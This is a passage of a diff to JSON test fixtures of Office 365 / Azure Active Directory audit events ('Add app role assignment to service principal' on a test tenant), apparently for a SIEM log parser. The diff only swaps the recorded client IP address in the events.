APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -15646,9 +15646,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -15882,7 +15882,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:30:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"654d7080-aee6-4826-abd9-c5710b336614\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:30:06.1843731Z\"},{\"Name\":\"env_epoch\",\"Value\":\"38FW7\"},{\"Name\":\"env_seqNum\",\"Value\":\"43117912\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78_00000000-0000-0000-0000-000000000000_eb6f4dc6-03bb-4c63-9cab-f08dd1f79c78\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR57\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"678f80a3-92c4-4bb6-83a1-1c39d5a87225\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}" }, "o365audit": { "Actor": [ @@ -15912,9 +15912,9 @@ } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "AzureActiveDirectoryEventType": 1, - "ClientIP": "83.57.233.151", + "ClientIP": "67.43.156.15", "CreationTime": "2020-02-10T15:30:06", "ExtendedProperties": [ { @@ -16148,7 +16148,7 @@ }, { "event": { - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 